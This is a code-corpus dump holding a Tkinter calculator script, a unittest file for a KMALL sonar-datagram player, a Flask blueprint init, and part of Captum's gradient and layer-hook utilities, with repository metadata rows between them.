self.btn_multiply = tkinter.Button(self.root, text="x", font=self.btn_font, command=lambda: self.btn_press("*"))
self.btn_multiply.grid(row=2, column=3, sticky="news")
# row 3
self.btn_4 = tkinter.Button(self.root, text="4", font=self.btn_font, command=lambda: self.btn_press("4"))
self.btn_4.grid(row=3, column=0, sticky="news")
self.btn_5 = tkinter.Button(self.root, text="5", font=self.btn_font, command=lambda: self.btn_press("5"))
self.btn_5.grid(row=3, column=1, sticky="news")
self.btn_6 = tkinter.Button(self.root, text="6", font=self.btn_font, command=lambda: self.btn_press("6"))
self.btn_6.grid(row=3, column=2, sticky="news")
self.btn_minus = tkinter.Button(self.root, text="-", font=self.btn_font, command=lambda: self.btn_press("-"))
self.btn_minus.grid(row=3, column=3, sticky="news")
# row 4
self.btn_1 = tkinter.Button(self.root, text="1", font=self.btn_font, command=lambda: self.btn_press("1"))
self.btn_1.grid(row=4, column=0, sticky="news")
self.btn_2 = tkinter.Button(self.root, text="2", font=self.btn_font, command=lambda: self.btn_press("2"))
self.btn_2.grid(row=4, column=1, sticky="news")
self.btn_3 = tkinter.Button(self.root, text="3", font=self.btn_font, command=lambda: self.btn_press("3"))
self.btn_3.grid(row=4, column=2, sticky="news")
self.btn_plus = tkinter.Button(self.root, text="+", font=self.btn_font, command=lambda: self.btn_press("+"))
self.btn_plus.grid(row=4, column=3, sticky="news")
# row 5
self.btn_0 = tkinter.Button(self.root, text="0", font=self.btn_font, command=lambda: self.btn_press("0"))
self.btn_0.grid(row=5, column=0, columnspan=2, sticky="news")
self.btn_dot = tkinter.Button(self.root, text=".", font=self.btn_font, command=lambda: self.btn_press("."))
self.btn_dot.grid(row=5, column=2, sticky="news")
self.btn_equal = tkinter.Button(self.root, text="=", font=self.btn_font, command=lambda: self.btn_press("="))
self.btn_equal.grid(row=5, column=3, sticky="news")
def clear(self):
self.ans = "0"
self.operator = None
self.user_input = ""
self.last_user_input = ""
self.ever_equals = False
self.is_result = False
self.update_display("0")
self.true_equal = False
def update_display(self, content):
self.display.delete(0, tkinter.END)
self.display.insert(0, content)
def calculation(self, ans, user_input, operator):
ans = float(ans)
user_input = float(user_input)
if operator != None:
if operator == "+":
ans = ans + user_input
if operator == "-":
ans = ans - user_input
if operator == "*":
ans = ans * user_input
if operator == "/":
ans = ans / user_input
return(str(ans))
else:
return(str(user_input))
def btn_press(self, press):
digits = [str(i) for i in range(10)]
operators = ["+","-","*","/"]
if press == "C":
self.clear()
if self.display.get() == "Error":
pass
else:
if press in digits:
if self.true_equal:
self.clear()
self.user_input += press
self.update_display(self.user_input)
self.is_result = False
if press in operators:
if not self.ever_equals and (not self.operator):
if self.user_input=="":
self.user_input = "0"
self.ans = self.user_input
self.user_input = ""
if self.operator and self.user_input !="":
self.btn_press("=")
self.operator = press
self.true_equal = False
if press == ".":
if "." not in self.user_input:
if self.user_input == "":
self.user_input = "0."
else:
self.user_input = self.user_input + "."
self.update_display(self.user_input)
self.is_result = False
if press == "+/-":
if self.is_result:
self.ans = str(-float(self.ans))
self.update_display(self.ans)
else:
if self.user_input == "":
self.user_input = "0"
self.user_input = str(-float(self.user_input))
self.update_display(self.user_input)
if press == "%":
if self.is_result:
self.ans = str(float(self.ans)/100)
self.update_display(self.ans)
else:
if self.user_input == "":
self.user_input = "0"
self.user_input = str(float(self.user_input)/100)
self.update_display(self.user_input)
if press == "=":
if self.user_input == "":
self.user_input = self.last_user_input
if self.user_input == "":
self.user_input = self.ans
try:
self.ans = self.calculation(self.ans, self.user_input, self.operator)
self.last_user_input = self.user_input
self.user_input = ""
self.update_display(self.ans)
self.ever_equals = True
self.is_result = True
self.true_equal = True
except:
self.update_display("Error")
if __name__ == "__main__":
root = tkinter.Tk()
Calculator(root)
root.mainloop()
| 41.91
| 124
| 0.547721
|
import tkinter
class Calculator:
app_title = "A simple calculator"
disp_font = ("Helvetica", 25, "bold")
btn_font = ("Helvetica", 20, "bold")
def __init__(self, root):
self.root = root
self.initialize()
def initialize(self):
self.ans = "0"
self.operator = None
self.user_input = ""
self.last_user_input = ""
self.is_result = False
self.ever_equals = False
self.true_equal = False
self.set_title()
self.set_display()
self.set_buttons()
self.clear()
def set_title(self):
self.root.title(self.app_title)
def set_display(self):
self.display = tkinter.Entry(self.root, font=self.disp_font, justify=tkinter.RIGHT)
self.display.grid(row=0, column=0, columnspan=4, sticky="news", ipady=10)
def set_buttons(self):
self.btn_clear = tkinter.Button(self.root, text="C", font=self.btn_font, command=lambda: self.btn_press("C"))
self.btn_clear.grid(row=1, column=0, sticky="news")
self.btn_negative = tkinter.Button(self.root, text="+/-", font=self.btn_font, command=lambda: self.btn_press("+/-"))
self.btn_negative.grid(row=1, column=1, sticky="news")
self.btn_percent = tkinter.Button(self.root, text="%", font=self.btn_font, command=lambda: self.btn_press("%"))
self.btn_percent.grid(row=1, column=2, sticky="news")
self.btn_divide = tkinter.Button(self.root, text="÷", font=self.btn_font, command=lambda: self.btn_press("/"))
self.btn_divide.grid(row=1, column=3, sticky="news")
self.btn_7 = tkinter.Button(self.root, text="7", font=self.btn_font, command=lambda: self.btn_press("7"))
self.btn_7.grid(row=2, column=0, sticky="news")
self.btn_8 = tkinter.Button(self.root, text="8", font=self.btn_font, command=lambda: self.btn_press("8"))
self.btn_8.grid(row=2, column=1, sticky="news")
self.btn_9 = tkinter.Button(self.root, text="9", font=self.btn_font, command=lambda: self.btn_press("9"))
self.btn_9.grid(row=2, column=2, sticky="news")
self.btn_multiply = tkinter.Button(self.root, text="x", font=self.btn_font, command=lambda: self.btn_press("*"))
self.btn_multiply.grid(row=2, column=3, sticky="news")
self.btn_4 = tkinter.Button(self.root, text="4", font=self.btn_font, command=lambda: self.btn_press("4"))
self.btn_4.grid(row=3, column=0, sticky="news")
self.btn_5 = tkinter.Button(self.root, text="5", font=self.btn_font, command=lambda: self.btn_press("5"))
self.btn_5.grid(row=3, column=1, sticky="news")
self.btn_6 = tkinter.Button(self.root, text="6", font=self.btn_font, command=lambda: self.btn_press("6"))
self.btn_6.grid(row=3, column=2, sticky="news")
self.btn_minus = tkinter.Button(self.root, text="-", font=self.btn_font, command=lambda: self.btn_press("-"))
self.btn_minus.grid(row=3, column=3, sticky="news")
self.btn_1 = tkinter.Button(self.root, text="1", font=self.btn_font, command=lambda: self.btn_press("1"))
self.btn_1.grid(row=4, column=0, sticky="news")
self.btn_2 = tkinter.Button(self.root, text="2", font=self.btn_font, command=lambda: self.btn_press("2"))
self.btn_2.grid(row=4, column=1, sticky="news")
self.btn_3 = tkinter.Button(self.root, text="3", font=self.btn_font, command=lambda: self.btn_press("3"))
self.btn_3.grid(row=4, column=2, sticky="news")
self.btn_plus = tkinter.Button(self.root, text="+", font=self.btn_font, command=lambda: self.btn_press("+"))
self.btn_plus.grid(row=4, column=3, sticky="news")
self.btn_0 = tkinter.Button(self.root, text="0", font=self.btn_font, command=lambda: self.btn_press("0"))
self.btn_0.grid(row=5, column=0, columnspan=2, sticky="news")
self.btn_dot = tkinter.Button(self.root, text=".", font=self.btn_font, command=lambda: self.btn_press("."))
self.btn_dot.grid(row=5, column=2, sticky="news")
self.btn_equal = tkinter.Button(self.root, text="=", font=self.btn_font, command=lambda: self.btn_press("="))
self.btn_equal.grid(row=5, column=3, sticky="news")
def clear(self):
self.ans = "0"
self.operator = None
self.user_input = ""
self.last_user_input = ""
self.ever_equals = False
self.is_result = False
self.update_display("0")
self.true_equal = False
def update_display(self, content):
self.display.delete(0, tkinter.END)
self.display.insert(0, content)
def calculation(self, ans, user_input, operator):
ans = float(ans)
user_input = float(user_input)
if operator != None:
if operator == "+":
ans = ans + user_input
if operator == "-":
ans = ans - user_input
if operator == "*":
ans = ans * user_input
if operator == "/":
ans = ans / user_input
return(str(ans))
else:
return(str(user_input))
def btn_press(self, press):
digits = [str(i) for i in range(10)]
operators = ["+","-","*","/"]
if press == "C":
self.clear()
if self.display.get() == "Error":
pass
else:
if press in digits:
if self.true_equal:
self.clear()
self.user_input += press
self.update_display(self.user_input)
self.is_result = False
if press in operators:
if not self.ever_equals and (not self.operator):
if self.user_input=="":
self.user_input = "0"
self.ans = self.user_input
self.user_input = ""
if self.operator and self.user_input !="":
self.btn_press("=")
self.operator = press
self.true_equal = False
if press == ".":
if "." not in self.user_input:
if self.user_input == "":
self.user_input = "0."
else:
self.user_input = self.user_input + "."
self.update_display(self.user_input)
self.is_result = False
if press == "+/-":
if self.is_result:
self.ans = str(-float(self.ans))
self.update_display(self.ans)
else:
if self.user_input == "":
self.user_input = "0"
self.user_input = str(-float(self.user_input))
self.update_display(self.user_input)
if press == "%":
if self.is_result:
self.ans = str(float(self.ans)/100)
self.update_display(self.ans)
else:
if self.user_input == "":
self.user_input = "0"
self.user_input = str(float(self.user_input)/100)
self.update_display(self.user_input)
if press == "=":
if self.user_input == "":
self.user_input = self.last_user_input
if self.user_input == "":
self.user_input = self.ans
try:
self.ans = self.calculation(self.ans, self.user_input, self.operator)
self.last_user_input = self.user_input
self.user_input = ""
self.update_display(self.ans)
self.ever_equals = True
self.is_result = True
self.true_equal = True
except:
self.update_display("Error")
if __name__ == "__main__":
root = tkinter.Tk()
Calculator(root)
root.mainloop()
| true
| true
|
f70b32e22f1f29ab259a93726874b66aebcfe48d
| 1,952
|
py
|
Python
|
kmall_player.test.py
|
monsterkittykitty/kmall
|
270c9d70de0b0b59dfa56d50db0466e655831e96
|
[
"CC0-1.0"
] | null | null | null |
kmall_player.test.py
|
monsterkittykitty/kmall
|
270c9d70de0b0b59dfa56d50db0466e655831e96
|
[
"CC0-1.0"
] | null | null | null |
kmall_player.test.py
|
monsterkittykitty/kmall
|
270c9d70de0b0b59dfa56d50db0466e655831e96
|
[
"CC0-1.0"
] | 1
|
2020-12-02T09:00:06.000Z
|
2020-12-02T09:00:06.000Z
|
import unittest
import pandas as pd
import os
from kmall_player import *
class KmallPlayerTest(unittest.TestCase):
def setUp(self) -> None:
file_name = "data/MRZ_LARGE_SIZE.kmall"
self.f = open(file_name, "rb")
self.file_size = os.fstat(self.f.fileno()).st_size
self.player = KmallPlayer()
k = KMALL.kmall(file_name)
k.index_file()
# Panda DataFrame type
self.index: pd.DataFrame = k.Index
self.mrz_pack = self.index.iloc[0]
def tearDown(self) -> None:
self.f.close()
def test_packet(self):
self.assertEqual(self.index.shape[0], 1)
self.assertTrue(self.mrz_pack['MessageSize'] > self.player.MAX_DATAGRAM_SIZE)
self.assertTrue('#MRZ' in self.mrz_pack['MessageType'])
def test_raw_header_reading(self):
header_dict = self.player.read_header_raw(self.f.read(self.player.HEADER_STRUCT_SIZE))
# Our test file contains only one packet
self.assertEqual(header_dict['numBytesDgm'], self.file_size)
self.assertTrue('#MRZ' in str(header_dict['dgmType']))
def test_partitionning(self):
msgs = self.player.partition_msg(self.f.read(self.mrz_pack['MessageSize']))
# Expecting 2 partitions
self.assertEqual(len(msgs), 2)
# Let's check the newly generated header content for our splits :
# First split should be of maximum size
self.assertEqual(self.player.read_header_raw(msgs[0])['numBytesDgm'], self.player.MAX_DATAGRAM_SIZE)
# Second and last split should take up the rest
last_packet_content_size = (self.file_size - self.player.HEADER_AND_PART_SIZE - 4)\
% self.player.MAX_DATA_SIZE
last_packet_size = last_packet_content_size + self.player.HEADER_AND_PART_SIZE + 4
self.assertEqual(self.player.read_header_raw(msgs[1])['numBytesDgm'], last_packet_size)
# Run tests
unittest.main()
| 39.836735
| 108
| 0.67418
|
import unittest
import pandas as pd
import os
from kmall_player import *
class KmallPlayerTest(unittest.TestCase):
def setUp(self) -> None:
file_name = "data/MRZ_LARGE_SIZE.kmall"
self.f = open(file_name, "rb")
self.file_size = os.fstat(self.f.fileno()).st_size
self.player = KmallPlayer()
k = KMALL.kmall(file_name)
k.index_file()
self.index: pd.DataFrame = k.Index
self.mrz_pack = self.index.iloc[0]
def tearDown(self) -> None:
self.f.close()
def test_packet(self):
self.assertEqual(self.index.shape[0], 1)
self.assertTrue(self.mrz_pack['MessageSize'] > self.player.MAX_DATAGRAM_SIZE)
self.assertTrue('#MRZ' in self.mrz_pack['MessageType'])
def test_raw_header_reading(self):
header_dict = self.player.read_header_raw(self.f.read(self.player.HEADER_STRUCT_SIZE))
self.assertEqual(header_dict['numBytesDgm'], self.file_size)
self.assertTrue('#MRZ' in str(header_dict['dgmType']))
def test_partitionning(self):
msgs = self.player.partition_msg(self.f.read(self.mrz_pack['MessageSize']))
self.assertEqual(len(msgs), 2)
# First split should be of maximum size
self.assertEqual(self.player.read_header_raw(msgs[0])['numBytesDgm'], self.player.MAX_DATAGRAM_SIZE)
# Second and last split should take up the rest
last_packet_content_size = (self.file_size - self.player.HEADER_AND_PART_SIZE - 4)\
% self.player.MAX_DATA_SIZE
last_packet_size = last_packet_content_size + self.player.HEADER_AND_PART_SIZE + 4
self.assertEqual(self.player.read_header_raw(msgs[1])['numBytesDgm'], last_packet_size)
# Run tests
unittest.main()
| true
| true
|
f70b34cdd9079c1a5bc04d0c71dc0e1703742f90
| 161
|
py
|
Python
|
csv_cti/blueprints/fs_api/__init__.py
|
Osmond1689/csv-cti
|
84be8241e9ba50f495b23775eb153e4129845474
|
[
"MIT"
] | null | null | null |
csv_cti/blueprints/fs_api/__init__.py
|
Osmond1689/csv-cti
|
84be8241e9ba50f495b23775eb153e4129845474
|
[
"MIT"
] | null | null | null |
csv_cti/blueprints/fs_api/__init__.py
|
Osmond1689/csv-cti
|
84be8241e9ba50f495b23775eb153e4129845474
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
fs_api=Blueprint('fs_api',__name__,template_folder='templates')
from .views import configuration,dialplan,directory,vars,update_cdr
| 32.2
| 67
| 0.84472
|
from flask import Blueprint
fs_api=Blueprint('fs_api',__name__,template_folder='templates')
from .views import configuration,dialplan,directory,vars,update_cdr
| true
| true
|
f70b35370574700e30c9df6e34e34f4182ba4a8c
| 34,208
|
py
|
Python
|
captum/captum/_utils/gradient.py
|
tbose20/D-Ref
|
eda6170a72838b89637df241dd5619e001f3afdb
|
[
"MIT"
] | 2
|
2022-03-24T13:41:51.000Z
|
2022-03-29T02:32:56.000Z
|
captum/captum/_utils/gradient.py
|
tbose20/D-Ref
|
eda6170a72838b89637df241dd5619e001f3afdb
|
[
"MIT"
] | null | null | null |
captum/captum/_utils/gradient.py
|
tbose20/D-Ref
|
eda6170a72838b89637df241dd5619e001f3afdb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import threading
import typing
import warnings
from collections import defaultdict
from typing import Any, Callable, Dict, List, Optional, Tuple, Union, cast
import torch
from captum._utils.common import (
_reduce_list,
_run_forward,
_sort_key_list,
_verify_select_neuron,
)
from captum._utils.typing import (
Literal,
ModuleOrModuleList,
TargetType,
TensorOrTupleOfTensorsGeneric,
)
from torch import Tensor, device
from torch.nn import Module
def apply_gradient_requirements(
inputs: Tuple[Tensor, ...], warn: bool = True
) -> List[bool]:
"""
Iterates through tuple on input tensors and sets requires_grad to be true on
each Tensor, and ensures all grads are set to zero. To ensure that the input
is returned to its initial state, a list of flags representing whether or not
a tensor originally required grad is returned.
"""
assert isinstance(
inputs, tuple
), "Inputs should be wrapped in a tuple prior to preparing for gradients"
grad_required = []
for index, input in enumerate(inputs):
assert isinstance(input, torch.Tensor), "Given input is not a torch.Tensor"
grad_required.append(input.requires_grad)
inputs_dtype = input.dtype
# Note: torch 1.2 doesn't support is_complex for dtype that's why we check
# on the existance of is_complex method.
if not inputs_dtype.is_floating_point and not (
hasattr(inputs_dtype, "is_complex") and inputs_dtype.is_complex
):
if warn:
warnings.warn(
"""Input Tensor %d has a dtype of %s.
Gradients cannot be activated
for these data types."""
% (index, str(inputs_dtype))
)
elif not input.requires_grad:
if warn:
warnings.warn(
"Input Tensor %d did not already require gradients, "
"required_grads has been set automatically." % index
)
input.requires_grad_()
return grad_required
def undo_gradient_requirements(
inputs: Tuple[Tensor, ...], grad_required: List[bool]
) -> None:
"""
Iterates through list of tensors, zeros each gradient, and sets required
grad to false if the corresponding index in grad_required is False.
This method is used to undo the effects of prepare_gradient_inputs, making
grads not required for any input tensor that did not initially require
gradients.
"""
assert isinstance(
inputs, tuple
), "Inputs should be wrapped in a tuple prior to preparing for gradients."
assert len(inputs) == len(
grad_required
), "Input tuple length should match gradient mask."
for index, input in enumerate(inputs):
assert isinstance(input, torch.Tensor), "Given input is not a torch.Tensor"
if not grad_required[index]:
input.requires_grad_(False)
def compute_gradients(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
) -> Tuple[Tensor, ...]:
r"""
Computes gradients of the output with respect to inputs for an
arbitrary forward function.
Args:
forward_fn: forward function. This can be for example model's
forward function.
input: Input at which gradients are evaluated,
will be passed to forward_fn.
target_ind: Index of the target class for which gradients
must be computed (classification only).
additional_forward_args: Additional input arguments that forward
function requires. It takes an empty tuple (no additional
arguments) if no additional arguments are required
"""
with torch.autograd.set_grad_enabled(True):
# runs forward pass
outputs = _run_forward(forward_fn, inputs, target_ind, additional_forward_args)
assert outputs[0].numel() == 1, (
"Target not provided when necessary, cannot"
" take gradient with respect to multiple outputs."
)
# torch.unbind(forward_out) is a list of scalar tensor tuples and
# contains batch_size * #steps elements
grads = torch.autograd.grad(torch.unbind(outputs), inputs,create_graph=True, retain_graph=True) #create_graph True, allow_unused is added TB
return grads
def _neuron_gradients(
inputs: Union[Tensor, Tuple[Tensor, ...]],
saved_layer: Dict[device, Tuple[Tensor, ...]],
key_list: List[device],
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
) -> Tuple[Tensor, ...]:
with torch.autograd.set_grad_enabled(True):
gradient_tensors = []
for key in key_list:
current_out_tensor = _verify_select_neuron(
saved_layer[key], gradient_neuron_selector
)
gradient_tensors.append(
torch.autograd.grad(
torch.unbind(current_out_tensor)
if current_out_tensor.numel() > 1
else current_out_tensor,
inputs,
)
)
_total_gradients = _reduce_list(gradient_tensors, sum)
return _total_gradients
@typing.overload
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> Tuple[Tensor, ...]:
...
@typing.overload
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: List[Module],
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> List[Tuple[Tensor, ...]]:
...
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]:
return _forward_layer_eval_with_neuron_grads(
forward_fn,
inputs,
layer,
additional_forward_args=additional_forward_args,
gradient_neuron_selector=None,
grad_enabled=grad_enabled,
device_ids=device_ids,
attribute_to_layer_input=attribute_to_layer_input,
)
@typing.overload
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
forward_hook_with_return: Literal[False] = False,
require_layer_grads: bool = False,
) -> Dict[Module, Dict[device, Tuple[Tensor, ...]]]:
...
@typing.overload
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
*,
forward_hook_with_return: Literal[True],
require_layer_grads: bool = False,
) -> Tuple[Dict[Module, Dict[device, Tuple[Tensor, ...]]], Tensor]:
...
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
forward_hook_with_return: bool = False,
require_layer_grads: bool = False,
) -> Union[
Tuple[Dict[Module, Dict[device, Tuple[Tensor, ...]]], Tensor],
Dict[Module, Dict[device, Tuple[Tensor, ...]]],
]:
r"""
A helper function that allows to set a hook on model's `layer`, run the forward
pass and returns intermediate layer results, stored in a dictionary,
and optionally also the output of the forward function. The keys in the
dictionary are the device ids and the values are corresponding intermediate layer
results, either the inputs or the outputs of the layer depending on whether we set
`attribute_to_layer_input` to True or False.
This is especially useful when we execute forward pass in a distributed setting,
using `DataParallel`s for example.
"""
saved_layer: Dict[Module, Dict[device, Tuple[Tensor, ...]]] = defaultdict(dict)
lock = threading.Lock()
all_layers: List[Module] = [layer] if isinstance(layer, Module) else layer
# Set a forward hook on specified module and run forward pass to
# get layer output tensor(s).
# For DataParallel models, each partition adds entry to dictionary
# with key as device and value as corresponding Tensor.
def hook_wrapper(original_module):
def forward_hook(module, inp, out=None):
eval_tsrs = inp if attribute_to_layer_input else out
is_eval_tuple = isinstance(eval_tsrs, tuple)
if not is_eval_tuple:
eval_tsrs = (eval_tsrs,)
if require_layer_grads:
apply_gradient_requirements(eval_tsrs, warn=False)
with lock:
nonlocal saved_layer
# Note that cloning behaviour of `eval_tsr` is different
# when `forward_hook_with_return` is set to True. This is because
# otherwise `backward()` on the last output layer won't execute.
if forward_hook_with_return:
saved_layer[original_module][eval_tsrs[0].device] = eval_tsrs
eval_tsrs_to_return = tuple(
eval_tsr.clone() for eval_tsr in eval_tsrs
)
if not is_eval_tuple:
eval_tsrs_to_return = eval_tsrs_to_return[0]
return eval_tsrs_to_return
else:
saved_layer[original_module][eval_tsrs[0].device] = tuple(
eval_tsr.clone() for eval_tsr in eval_tsrs
)
return forward_hook
all_hooks = []
try:
for single_layer in all_layers:
if attribute_to_layer_input:
all_hooks.append(
single_layer.register_forward_pre_hook(hook_wrapper(single_layer))
)
else:
all_hooks.append(
single_layer.register_forward_hook(hook_wrapper(single_layer))
)
output = _run_forward(
forward_fn,
inputs,
target=target_ind,
additional_forward_args=additional_forward_args,
)
finally:
for hook in all_hooks:
hook.remove()
if len(saved_layer) == 0:
raise AssertionError("Forward hook did not obtain any outputs for given layer")
if forward_hook_with_return:
return saved_layer, output
return saved_layer
def _gather_distributed_tensors(
saved_layer: Dict[device, Tuple[Tensor, ...]],
device_ids: Union[None, List[int]] = None,
key_list: Union[None, List[device]] = None,
) -> Tuple[Tensor, ...]:
r"""
A helper function to concatenate intermediate layer results stored on
different devices in `saved_layer`. `saved_layer` is a dictionary that
contains `device_id` as a key and intermediate layer results (either
the input or the output of the layer) stored on the device corresponding to
the key.
`key_list` is a list of devices in appropriate ordering for concatenation
and if not provided, keys are sorted based on device ids.
If only one key exists (standard model), key list simply has one element.
"""
if key_list is None:
key_list = _sort_key_list(list(saved_layer.keys()), device_ids)
return _reduce_list([saved_layer[device_id] for device_id in key_list])
def _extract_device_ids(
forward_fn: Callable,
saved_layer: Dict[Module, Dict[device, Tuple[Tensor, ...]]],
device_ids: Union[None, List[int]],
) -> Union[None, List[int]]:
r"""
A helper function to extract device_ids from `forward_function` in case it is
provided as part of a `DataParallel` model or if is accessible from
`forward_fn`.
In case input device_ids is not None, this function returns that value.
"""
# Multiple devices / keys implies a DataParallel model, so we look for
# device IDs if given or available from forward function
# (DataParallel model object).
if (
max(len(saved_layer[single_layer]) for single_layer in saved_layer) > 1
and device_ids is None
):
if (
hasattr(forward_fn, "device_ids")
and cast(Any, forward_fn).device_ids is not None
):
device_ids = cast(Any, forward_fn).device_ids
else:
raise AssertionError(
"Layer tensors are saved on multiple devices, however unable to access"
" device ID list from the `forward_fn`. Device ID list must be"
" accessible from `forward_fn`. For example, they can be retrieved"
" if `forward_fn` is a model of type `DataParallel`. It is used"
" for identifying device batch ordering."
)
return device_ids
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
*,
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Tuple[Tensor, ...]:
...
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: List[Module],
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> List[Tuple[Tensor, ...]]:
...
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
additional_forward_args: Any = None,
gradient_neuron_selector: Union[
None, int, Tuple[Union[int, slice], ...], Callable
] = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Union[
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[Tensor, ...],
List[Tuple[Tensor, ...]],
]:
"""
This method computes forward evaluation for a particular layer using a
forward hook. If a gradient_neuron_selector is provided, then gradients with
respect to that neuron in the layer output are also returned.
These functionalities are combined due to the behavior of DataParallel models
with hooks, in which hooks are executed once per device. We need to internally
combine the separated tensors from devices by concatenating based on device_ids.
Any necessary gradients must be taken with respect to each independent batched
tensor, so the gradients are computed and combined appropriately.
More information regarding the behavior of forward hooks with DataParallel models
can be found in the PyTorch data parallel documentation. We maintain the separate
evals in a dictionary protected by a lock, analogous to the gather implementation
for the core PyTorch DataParallel implementation.
"""
grad_enabled = True if gradient_neuron_selector is not None else grad_enabled
with torch.autograd.set_grad_enabled(grad_enabled):
saved_layer = _forward_layer_distributed_eval(
forward_fn,
inputs,
layer,
additional_forward_args=additional_forward_args,
attribute_to_layer_input=attribute_to_layer_input,
)
device_ids = _extract_device_ids(forward_fn, saved_layer, device_ids)
# Identifies correct device ordering based on device ids.
# key_list is a list of devices in appropriate ordering for concatenation.
# If only one key exists (standard model), key list simply has one element.
key_list = _sort_key_list(list(next(iter(saved_layer.values())).keys()), device_ids)
if gradient_neuron_selector is not None:
assert isinstance(
layer, Module
), "Cannot compute neuron gradients for multiple layers simultaneously!"
inp_grads = _neuron_gradients(
inputs, saved_layer[layer], key_list, gradient_neuron_selector
)
return (
_gather_distributed_tensors(saved_layer[layer], key_list=key_list),
inp_grads,
)
else:
if isinstance(layer, Module):
return _gather_distributed_tensors(saved_layer[layer], key_list=key_list)
else:
return [
_gather_distributed_tensors(saved_layer[curr_layer], key_list=key_list)
for curr_layer in layer
]
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: Module,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
*,
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: List[Module],
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[List[Tuple[Tensor, ...]], List[Tuple[Tensor, ...]]]:
...
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: Module,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: ModuleOrModuleList,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: Union[
None, int, Tuple[Union[int, slice], ...], Callable
] = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Union[
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[List[Tuple[Tensor, ...]], List[Tuple[Tensor, ...]]],
]:
r"""
Computes gradients of the output with respect to a given layer as well
as the output evaluation of the layer for an arbitrary forward function
and given input.
For data parallel models, hooks are executed once per device ,so we
need to internally combine the separated tensors from devices by
concatenating based on device_ids. Any necessary gradients must be taken
with respect to each independent batched tensor, so the gradients are
computed and combined appropriately.
More information regarding the behavior of forward hooks with DataParallel
models can be found in the PyTorch data parallel documentation. We maintain
the separate inputs in a dictionary protected by a lock, analogous to the
gather implementation for the core PyTorch DataParallel implementation.
NOTE: To properly handle inplace operations, a clone of the layer output
is stored. This structure inhibits execution of a backward hook on the last
module for the layer output when computing the gradient with respect to
the input, since we store an intermediate clone, as
opposed to the true module output. If backward module hooks are necessary
